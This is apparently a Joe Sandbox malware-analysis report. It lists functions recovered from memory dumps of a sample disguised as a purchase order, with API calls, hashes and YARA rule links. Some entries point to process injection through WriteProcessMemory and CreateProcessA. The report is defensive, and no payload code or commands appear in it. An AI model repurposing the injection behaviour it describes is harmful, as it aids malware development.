Function 07513528 Relevance: 1.7, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

, xrefs: 07515B6E

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6bd58e3bd554980fd69f6cc36790fb8dafda4367572a472048739f6665a059bd
Instruction ID: 7c037f85be6b33ea8541b07c503e5bdfb3953ec286f58b3682862b86b1e477e0
Opcode Fuzzy Hash: 6bd58e3bd554980fd69f6cc36790fb8dafda4367572a472048739f6665a059bd
Instruction Fuzzy Hash: 39021C71E0021ACFEB54EB64CC54BDDB7B2BF89301F11869AD109A7290EF70AA85CF51

Function 0C46DEB0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d643062e8d704abb09cf06c77ac0c0312364927866c40a7879952f0389e4d20
Instruction ID: 07d480220b75db9de50ee7be2918e391c44a10d1cf9951608a8f12f2b13475a9
Opcode Fuzzy Hash: 3d643062e8d704abb09cf06c77ac0c0312364927866c40a7879952f0389e4d20
Instruction Fuzzy Hash: C4525B35A01619CFCB21DF65C844AE9B7F2FF49305F1485DAE409AB265EB31EA82CF41

Function 0B880040 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c469f044220be96a3791755bf2107256daf2aa4d4c40018ce811da5882ffb788
Instruction ID: ae4aaac2642ff3eeeb27e948076846e9a7a1043f0252d215ab46815b9b80d1a7
Opcode Fuzzy Hash: c469f044220be96a3791755bf2107256daf2aa4d4c40018ce811da5882ffb788
Instruction Fuzzy Hash: DB324A35A00619CFDB21EF65C944BD9B7B2FF49304F1485E9E409AB261EB71EA85CF40

Function 07022728 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e10118b30b730c0de5c67d28c33fd3d7aa2f0af4ac2da81b4bfddb7876eadcc
Instruction ID: ce9f95ff154958bf96e41550118a115a0c3561b64b36d0150fb490be6743e497
Opcode Fuzzy Hash: 7e10118b30b730c0de5c67d28c33fd3d7aa2f0af4ac2da81b4bfddb7876eadcc
Instruction Fuzzy Hash: BFC18EB2D002298FCB55CFA5C88079DBBF2BF88310F15C26AD449AB255DB70D986DF51

Function 0B889516 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827f56bce35b3461d0dd8b1801c82fda237f705868a288d47b9d6d2f7b3470e9
Instruction ID: 58a0c2f18eb6e224fccdc9d85273f2579e34307799e8c3f03308d3710d456c28
Opcode Fuzzy Hash: 827f56bce35b3461d0dd8b1801c82fda237f705868a288d47b9d6d2f7b3470e9
Instruction Fuzzy Hash: 31E0E53895920CDFCB54AF84E5486F8BBB9BB4E715F1034A1D42EE3221DB755A88DE04

Function 0B889569 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da84d2eff485ff425f167bbed26a939f31e7bba4a78daef3ec3079f15cd90cb9
Instruction ID: f4918c8785ca63c449a7ee17f9377b350e4549b871a165b1b13ea77c2735271b
Opcode Fuzzy Hash: da84d2eff485ff425f167bbed26a939f31e7bba4a78daef3ec3079f15cd90cb9
Instruction Fuzzy Hash: 46E09A3894D24CDFCB40AAA4A1481F8BFB9A74B615F5430A2C12DD3212DB3445048B19

Function 00F9D149 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F9D1D6
GetCurrentThread.KERNEL32 ref: 00F9D213
GetCurrentProcess.KERNEL32 ref: 00F9D250
GetCurrentThreadId.KERNEL32 ref: 00F9D2A9

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3accab9dbb0d79a9efe34641c645995354c6cde0100c93c5f9d83877d0c7e4df
Instruction ID: 24786d20deec8a066606e0c1f74de7260c3a76ee58202ca2354f371c1dd70b26
Opcode Fuzzy Hash: 3accab9dbb0d79a9efe34641c645995354c6cde0100c93c5f9d83877d0c7e4df
Instruction Fuzzy Hash: 865175B0D003098FDB54DFAAD548BDEBBF1EF88314F208459E019A72A1CB349985CF65

Function 00F9D158 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F9D1D6
GetCurrentThread.KERNEL32 ref: 00F9D213
GetCurrentProcess.KERNEL32 ref: 00F9D250
GetCurrentThreadId.KERNEL32 ref: 00F9D2A9

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5c1b18c4b80580c4bb06ab99b7fe22243e6dbd58ec80e5019b36c9cbbe46d2e6
Instruction ID: 172ac4a10263d298000c2a1fd1ad36c7ebd246b2be42a87acb49869182becdc1
Opcode Fuzzy Hash: 5c1b18c4b80580c4bb06ab99b7fe22243e6dbd58ec80e5019b36c9cbbe46d2e6
Instruction Fuzzy Hash: 985156B0D013098FDB14DFAAD548B9EBBF1EF88314F208469E019A73A0DB749985CF65

Function 02B63688 Relevance: 5.0, APIs: 3, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033a7474cec36d7621dbb8a8cabcc91bf11ceee4e4c41850c545a0f38f063524
Instruction ID: 2fa355e5a66004948a42e00724629f239694f00cf9b33bd0bd95d4be598c2b1f
Opcode Fuzzy Hash: 033a7474cec36d7621dbb8a8cabcc91bf11ceee4e4c41850c545a0f38f063524
Instruction Fuzzy Hash: DE222B74E00645CFDB24DB58C58CABEBBB2EB94B10F2480E6D915A7265CB3CD881CF91

Function 0710D098 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0710D2CE

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4bc2115cc236c967d3f0f70ef8e3e29744e39cc08bc61441a6cdbae01475dd66
Instruction ID: 8fd79a5be4e9b94cbc377792d960a93eccf36cad598278499eb874695b04920e
Opcode Fuzzy Hash: 4bc2115cc236c967d3f0f70ef8e3e29744e39cc08bc61441a6cdbae01475dd66
Instruction Fuzzy Hash: D7914FB1E00219DFDB15DFA8D8417DDBBB2BF48314F1481A9E848A72D0DB749985CF92

Function 00F9AED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b91b415dfe2a069b5272cfbceef2081b2f154ae8e62195d47244304c0ca1833d
Instruction ID: 14c3b9a7b8ac2af3bc93a1103dbaf993c6d2294c18336c0f240339dbf23fa51d
Opcode Fuzzy Hash: b91b415dfe2a069b5272cfbceef2081b2f154ae8e62195d47244304c0ca1833d
Instruction Fuzzy Hash: D47154B0A00B058FEB24DF29D15576ABBF1BF88314F00892DE08AD7A50DB75E849DF91

Function 02B6BDC0 Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,03B8412C,02BA094C,?,00000000), ref: 02B6BF46

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6d8d962eb0c8ef011b6809f59dc9e743eca82e22da10b70fa3065b16307bbbfe
Instruction ID: 7a129c27c99ff6da88c1e4650271c5f021a29121bb48a4acca9c8f319507006a
Opcode Fuzzy Hash: 6d8d962eb0c8ef011b6809f59dc9e743eca82e22da10b70fa3065b16307bbbfe
Instruction Fuzzy Hash: DF719134A01208AFCB15DFA8D898EAEBBB2FF49714F114499F901AB361D735E881CF50

Function 02B61CE5 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B61E02

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 551e51da9829c14d66360a2b544b87e6b9afe0f0604815987176cce71a4e71ac
Instruction ID: 2c6cf2fd123dbaccb8e4052bf73ff6857ad5a11d51f86c135ef2415c7993146f
Opcode Fuzzy Hash: 551e51da9829c14d66360a2b544b87e6b9afe0f0604815987176cce71a4e71ac
Instruction Fuzzy Hash: 1651CEB1D103499FDB14CFA9C884ADEBBB5FF88314F24816AE818AB310D7759945CF90

Function 02B61CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B61E02

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0b373b460bbb7e0ff779dfcb9f163fcd5043f88be874e81471385b491fa81368
Instruction ID: 63dbbaa144f182c4ce52476906b2504fbcfe6b13411920f5bba9c8587010576e
Opcode Fuzzy Hash: 0b373b460bbb7e0ff779dfcb9f163fcd5043f88be874e81471385b491fa81368
Instruction Fuzzy Hash: 1941CEB1D103099FDB14CFA9C984ADEBBB5FF48314F24816AE818AB310D7759885CF90

Function 0751CCE8 Relevance: 1.6, APIs: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0751EFA6

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: cf0597394d18dfc1e1f30783dc57d8bd209b0c41a7a05052ed0b250f79c80c42
Instruction ID: 46f44dd47519a8bb32def96a2f78b957a5f4090bcf860b82b649c1e0a9b48b2b
Opcode Fuzzy Hash: cf0597394d18dfc1e1f30783dc57d8bd209b0c41a7a05052ed0b250f79c80c42
Instruction Fuzzy Hash: D4319EB0A012568FEB109F69C445AAEBBB4BF48715F144459E815AB354CB75E841CBD0

Function 02B60BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02B64381

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5535291fbaab4aa401d26202575120cecb2fc8e55f8d7829f2d1b3bc5a2de493
Instruction ID: cae4aba4961d2b70160057c581034b3f6125fcfa888b4ddfb63d120a6b6280b8
Opcode Fuzzy Hash: 5535291fbaab4aa401d26202575120cecb2fc8e55f8d7829f2d1b3bc5a2de493
Instruction Fuzzy Hash: BE4128B5A00705CFCB14DF99C448AAAFBF5FB88314F28C499E519AB321D774A845CFA0

Function 00F9449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F959A9

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 232f915f3e9c04a17b06a77dfafc5b04210258370e587e6a4f9d191655b6ae67
Instruction ID: 1453e64bec816b353ba37bcebb3fee63167319d5d34407ac57306bfbcf2f9b7a
Opcode Fuzzy Hash: 232f915f3e9c04a17b06a77dfafc5b04210258370e587e6a4f9d191655b6ae67
Instruction Fuzzy Hash: B341F1B0C0071DCBEF24DFAAC844B9EBBB5BF48704F20806AD409AB255DB756945CF90

Function 00F958ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F959A9

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f55b9aed0859913a506484588929bc4a5278454a5cc1e9fafd839f77ea6d0a2c
Instruction ID: 5ad7dd41996e93bffdaf5f2f33bb770b529637f8b842f6ed4d2163e306db2dd9
Opcode Fuzzy Hash: f55b9aed0859913a506484588929bc4a5278454a5cc1e9fafd839f77ea6d0a2c
Instruction Fuzzy Hash: 4E4112B0C00B19CEEF24CFA9C8847CDBBB5BF48714F24805AD449AB255DB755946CF90

Function 07023100 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 32069a113e4630e7280b9013f850d9622b4740769c64ce57d61053380f38910b
Instruction ID: 30938245844a80308164afc450259d4863e9477b338b7997f67269723f883372
Opcode Fuzzy Hash: 32069a113e4630e7280b9013f850d9622b4740769c64ce57d61053380f38910b
Instruction Fuzzy Hash: A0317AB29043999FCB11DFA9C804ADEBFF8EF49310F14806AE954A7261C3359851DFA5

Function 07020410 Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0702311A,?,?,?,?,?), ref: 070231BF

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: be5afbd88c97e348d1df74270cae6e1d99037379b6668ce6e8305d9c5b32e6d3
Instruction ID: 97ea20850a3dfebfb4c7d20a67724f093f1b8db01830e6482d9561dd10a79397
Opcode Fuzzy Hash: be5afbd88c97e348d1df74270cae6e1d99037379b6668ce6e8305d9c5b32e6d3
Instruction Fuzzy Hash: AE31CAF29003599FDB10DFA9C840BEEBFF8EB48310F10845AE494A7260C7399981DFA5

Function 075150B0 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0751512E

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4d0dba4affe565d101c1a1ffadce76afe08068686f78ea8728229222b053af4
Instruction ID: ecaad97d99a5a339347ed63e71ed5a6ad0b76822b970c9cb46f89ee8b9d28e51
Opcode Fuzzy Hash: d4d0dba4affe565d101c1a1ffadce76afe08068686f78ea8728229222b053af4
Instruction Fuzzy Hash: 7021DEB6B001019FEB14EB69DC01BAEB7A2FFC4725F0481A9E509A7755DB74E821CBD0

Function 0751EF31 Relevance: 1.6, APIs: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0751EFA6

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: be1ee92d3891e19e0489036464c801e5684d7586e58eae49e5f9258be6b90623
Instruction ID: f27214eef76786e0930643f1821357504ae299c0fab69fc5b16e855880cd5b6a
Opcode Fuzzy Hash: be1ee92d3891e19e0489036464c801e5684d7586e58eae49e5f9258be6b90623
Instruction Fuzzy Hash: 9521ADB19003998FDB10CF69D445BEEBBB4FB48721F1485AAE804AB311C734A844CFE1

Function 0751C12A Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0751C1BA

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d6acb789fd3b296f3e975cdf1ad806d32cd94b4a1e3c12f0c3a38f7ce1f009be
Instruction ID: 1021ba0b80ad2a013ce76e84fce8614d1e57efdc9775287bcc944d723000f1ee
Opcode Fuzzy Hash: d6acb789fd3b296f3e975cdf1ad806d32cd94b4a1e3c12f0c3a38f7ce1f009be
Instruction Fuzzy Hash: 373198B4A402498FDB00DFAAD440ADEFFF0FB49314F10896AD419AB311C735A948CFA1

Function 0702790C Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07028E35,?,?), ref: 07028EE7

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: f001f3d026298acef9e22317aa7e8182cb32d0876ab01901cf73539d20e9c4d6
Instruction ID: 26d00ae97e5ec1464f0143ceccc89462f732208bd72efe39f60162803d399e99
Opcode Fuzzy Hash: f001f3d026298acef9e22317aa7e8182cb32d0876ab01901cf73539d20e9c4d6
Instruction Fuzzy Hash: D03103B5D00319AFCB10CF9AD880ADEFBF4FB48324F14842AE919A7250C774A941CFA4

Function 075130B0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0751314A

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 17b9205ff922db200fb380b2658348c3919ce55c0103e6b747a4ddec00cbe082
Instruction ID: cf84da0fa458d93e38daa620d44810667f3ab59b514fa2aba846c2254fdbd81c
Opcode Fuzzy Hash: 17b9205ff922db200fb380b2658348c3919ce55c0103e6b747a4ddec00cbe082
Instruction Fuzzy Hash: 032168B68042499FDB10CF9AC844BDEFFF4EF49310F15806AE858A7241C378A545CFA5

Function 07028E48 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07028E35,?,?), ref: 07028EE7

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 1b42d57dc86f64448fa4fc5a8db0fcded8799d6c279109121ef9f965d0538fea
Instruction ID: 0d2dcaa2e0495a8b0d73a862ae73f558de73da8c7925054f1ad0510311705f55
Opcode Fuzzy Hash: 1b42d57dc86f64448fa4fc5a8db0fcded8799d6c279109121ef9f965d0538fea
Instruction Fuzzy Hash: 9E31E3B5D002199FCB11CF99D980ADEFBF4FF48324F14842AE859A7250C774A545CFA4

Function 0710CA10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0710CAA0

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e7cfa29cc5983e4cf27c6a40fd8b2deecaf84dc8da00de5df33cb1b4a26de4bc
Instruction ID: 3c2f7cb833a056976b56c9c6279a91b70ecbf1e5e0b719992fad90e12692cdd4
Opcode Fuzzy Hash: e7cfa29cc5983e4cf27c6a40fd8b2deecaf84dc8da00de5df33cb1b4a26de4bc
Instruction Fuzzy Hash: 322115B19002599FCB10CFA9C885BDEBBF5FB48310F10882AE958A7291D7789954CBA4

Function 075131B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 0751323C

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: a3198b30ce915f90f6ece7307963ff9c5af05dd0aaadd60919bf5edaf5419c6a
Instruction ID: ddbb4a1c61b3d986c46a1d7a1f0232dc178f407c5c83a647347e42dc87aad6da
Opcode Fuzzy Hash: a3198b30ce915f90f6ece7307963ff9c5af05dd0aaadd60919bf5edaf5419c6a
Instruction Fuzzy Hash: 822137B190031A9FDB10DF9AC884ADEFBF4FB48310F14806AE558A3240D335A545CB64

Function 00F9D398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D427

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ea81299bc3ad40f6ba4d4cf8cd0b41ceca37cfc49d23761426edc5d8dd36d574
Instruction ID: 324c1a7982da2269afc64b9e5073f0ba305e13d584d4ca8bd5ac47497bd4c6c0
Opcode Fuzzy Hash: ea81299bc3ad40f6ba4d4cf8cd0b41ceca37cfc49d23761426edc5d8dd36d574
Instruction Fuzzy Hash: 612114B5D002589FDB10CFAAD985AEEFFF4EB48320F24801AE954A7351C375A944CFA0

Function 07514828 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 075148A7

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: 9d9392dd56058c5a75b4e47a3991b856462fdae4adec1cc13a724bf229b85639
Instruction ID: 187509c96f2efe1e31267936b9ffc2d005fde962c56265233ce9c87cb6646ba8
Opcode Fuzzy Hash: 9d9392dd56058c5a75b4e47a3991b856462fdae4adec1cc13a724bf229b85639
Instruction Fuzzy Hash: E3213BB1A002899FDB10DF99D449BEEFBF5EB48310F10841AE555A7750CB74A944CFA1

Function 0C4611F1 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0C46127D

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8cd65281ebfe56c4329f8f1ef7a978d110b6f5ba28ae4ef8bded746620983564
Instruction ID: bab57f0237563f5763014b37150217d33e2001bc89989f9778da1237cb23ffa5
Opcode Fuzzy Hash: 8cd65281ebfe56c4329f8f1ef7a978d110b6f5ba28ae4ef8bded746620983564
Instruction Fuzzy Hash: D02134B18043499FDB05CF99C889AAAFFF8FB49310F14845AD458A76A1C334A944CFA1

Function 0710CF00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0710CF80

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b9bcb94ae8c735fc1ffcefcb039e3c3eaed6dde3295ae742cd8e20669f8c26ea
Instruction ID: 53754b5a3290f0bac7f03aabf3e04713ba3247e82269959ab48aa2ecf0ec78bb
Opcode Fuzzy Hash: b9bcb94ae8c735fc1ffcefcb039e3c3eaed6dde3295ae742cd8e20669f8c26ea
